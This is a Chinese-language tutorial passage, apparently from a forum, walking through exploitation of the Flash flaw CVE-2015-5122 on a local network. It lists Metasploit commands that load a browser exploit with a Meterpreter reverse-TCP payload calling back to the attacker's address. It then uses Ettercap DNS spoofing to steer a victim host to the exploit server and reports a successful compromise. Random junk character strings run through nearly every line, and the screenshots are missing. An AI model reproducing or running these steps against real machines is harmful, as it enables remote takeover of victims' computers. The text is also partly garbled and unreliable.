! N( c+ S: U3 g% J
二、cve2015-5122漏洞实例演示虚拟机
" b$ n: ~9 {* c3 f! I( e' t. K$ i , [5 [0 `8 Q' m! v w( p( |: B
3 u$ [, x8 G& A3 F4 f
关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 0 A) X& l1 f7 A% B6 j4 P- K
* L4 a4 z2 K! `* Y' ?7 E
7 ~+ Z" _, o7 [6 |" A search cve-2015-5122如图:
! L& S I$ C/ N$ D ~& K7 J E7 z" `" |- A1 t& o% G3 y5 _) @8 A
" J; g& G$ t: [* J7 X. \
1 Q/ w9 ^/ {9 j ( d9 e( B* [9 R1 B |: O
( z4 \; k/ [8 r$ ^. t0 X; E 下面我们敲如下命令: 4 Q. ]4 q6 j# {2 m9 k
' _/ R3 s6 |/ i5 ` R$ B
$ [: e4 f5 c3 U6 d4 {8 ^8 G
use exploit/multi/browser/adobe_flash_opaque_background_uaf
) V) F: T4 a4 r3 Z3 Y7 B& N
_- y* F- C+ ~1 u1 N* `1 c* w9 l$ Y! p. G' x1 M( K- I
set PAYLOAD windows/meterpreter/reverse_tcp
, p7 Q( Y1 g. F( {" L( C5 H m * X4 }# q/ q. A; X- q- |8 ^: _
# Z/ z* Y8 m; q+ Q' V \ set LHOST 192.168.0.109 * y" C7 H# |- Z% o& ~, k" Y
1 D- X. G+ Q% G) w1 h9 b
/ ^% j7 C+ W3 |+ z set URIPATH / /*根目录*/
; T( Z- W2 X% K
" T; G/ S6 i% V' L) e, ]; I; `* o! y7 I& _
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ( a2 A7 T5 l" b* \( i8 A$ B5 N8 [ P
4 k$ J2 C; x& m1 F/ W
* ?4 g& w, D9 d# J set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
$ r: e& D+ [- X. r$ z8 g! v5 i
& V" j$ F2 ?( h3 ]7 ]
7 F; ]: o: J# Y" Q4 u 然后show options如图:
' ?( S7 L) L+ B8 x9 \9 s. ` / o$ ~3 A% ^6 u" d6 E4 A% d
" X ^* [: {7 q; t6 y; z
5 h2 o) M2 T' j9 R
4 W. `% S8 W" F* Q: M0 r+ _" l7 z7 E. z
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
) Y x7 O9 G1 q; |( S: `* F 2 S6 F9 E; u5 {1 X
7 g8 x/ S3 h) A( U# L- {$ S f5 }, u
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
. J7 o* q* G) b4 |+ K1 A' _ . p6 w X0 A$ x: U
+ E; _! {& |5 | B8 W0 S
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
9 ?* J+ y8 I, g) `7 }' a
0 N- r. \3 n2 v3 m# N& [# `, `% z
" ~, V- E# ]# K, d; s 0 }3 m6 ~5 G. @" W# q
5 q$ q S( v, V
8 ?2 V- C5 S7 J; K" J8 u 成功了,这时候我们断开ettercap,如图:
$ P; \* o/ u# V2 n
. x1 x/ V7 f+ n$ e
$ E, a/ b$ p |: v! w3 j
& S) b" R3 a$ X H9 b : k2 }& t1 K1 I3 V/ V+ m: h: W
# k8 f% g' W; n7 v' _. K) g
Screenshot如图:
, K# `) f- F9 N( f6 L7 J
6 ~. Y; d, k6 R9 P% D8 Q& Z7 X, F X' ~$ J- W8 E
: ^5 b5 a# e6 _# q% L# @1 j # g) K+ U& a6 Q& D4 f2 a6 }8 y
/ @/ y" m- a' W" `) ~ ! B% W5 `% A, a& ~2 V$ a
|